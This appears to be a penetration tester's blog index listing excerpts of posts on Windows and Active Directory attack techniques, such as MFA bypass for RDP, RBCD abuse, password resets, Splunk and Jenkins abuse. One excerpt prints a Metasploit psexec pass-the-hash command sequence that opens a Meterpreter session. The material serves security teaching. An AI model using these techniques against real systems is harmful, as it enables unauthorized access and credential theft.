I’ll state this upfront, so as not to confuse: This is a POST exploitation technique. This is mostly for when you have already gained admin on the system via other means and want to be able to RDP without needing MFA. Okta MFA Credential Provider for Windows enables strong authentication using MFA with Remote Desktop…

Metasploit recently released version 6.3.  With it came a whole lot of new features related to LDAP operations and using Kerberos authentication. In this blog I want to demonstrate how to perform a GenericWrite -> RBCD attack, which I find are very common. Often times a user will not have administrative access to a computer,…

There are two common reasons you may want to change a user’s password during a penetration test: You have their NT hash but not their plaintext password. Changing their password to a known plaintext value can allow you to access services in which Pass-the-Hash is not an option. You don’t have their NT hash or…

Recently I was browsing Twitter and came across a very interesting tweet: Umm- why can I find the password I used to connect to a remote desktop service in cleartext in memory of RDP service? First saw my microsoft accounts pwd- made new local account- same thing. For this user its: wtfmsnotcool pic.twitter.com/lRMhDCMJkH — Jonas…

Do you remember the first time you passed the hash?  It probably went a little something like this: msf > use exploit/windows/smb/psexec msf exploit(psexec) > set SMBPass e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c SMBPass => e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c msf exploit(psexec) > exploit [*] Sending stage (719360 bytes) [*] Meterpreter session 1 opened (192.168.57.133:443 -> 192.168.57.131:1045) If you are unfamiliar, that is the…

I recently came across a peculiar scenario that caused me to have to think a little outside the box. I was able to obtain credentials for an account that was part of the “Account Operators” group.  Here is Microsoft’s description of that group: The Account Operators group grants limited account creation privileges to a user….

Every now and then when testing networks, I run into Splunk.  Splunk is a software platform to search, analyze and visualize data.  It is super useful for all sorts of purposes.  As a pentester, it can be useful as it often contains all sorts of data, some of which may be sensitive.  Gaining access to…

Often times while performing penetration tests it may be helpful to connect to a system via the Remote Desktop Protocol (RDP). I typically use rdesktop or xfreerdp to connect to host once I have obtained credentials to do all sorts of things such as use Active Directory Users and Computers or SQL Management Studio.  One…

Here are the slides and video from my presentation at Bsides Puerto Rico 2017-2018. Bsides Puerto Rico 2017-2018 from Esteban Rodriguez

      Jenkins is an open-source continuous integration software tool written in the Java programming language.  While useful to developers, it can also be useful to attackers.  Often times developers will leave Jenkins consoles in an insecure state, especially within development environments.  Jenkins has a scripting console available which can be used to run…